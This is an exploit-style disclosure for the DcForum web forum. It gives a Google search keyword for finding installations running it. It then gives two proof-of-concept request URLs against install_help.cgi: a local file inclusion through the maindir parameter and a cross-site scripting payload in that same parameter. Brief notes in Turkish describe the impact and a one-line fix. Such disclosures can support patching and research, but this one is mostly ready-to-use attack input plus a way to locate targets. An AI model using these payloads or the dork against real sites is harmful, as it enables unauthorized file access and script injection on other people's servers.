< ------------------- header data start ------------------- >

#############################################################

# Application Name : DcForum

# Vulnerable Type : LFI / XSS

# Google Keyword : Powered by DcForum

# Infection : Local olarak Tüm Dosyalara erisim saglanip Degisiklik yapilabilir.

# Bug Fix Advice : Undefined degerler tanimlanmalidir.

# author : Bug Researchers

#############################################################

< ------------------- header data end of ------------------- >



< -- bug code start -- >

LFI;

http://localhost/cgi-bin/patch/install_help.cgi?maindir=[Local file]

XSS;

http://localhost/cgi-bin/patch/install_help.cgi?maindir=><script>alert(cr4)</script>

< -- bug code end of -- >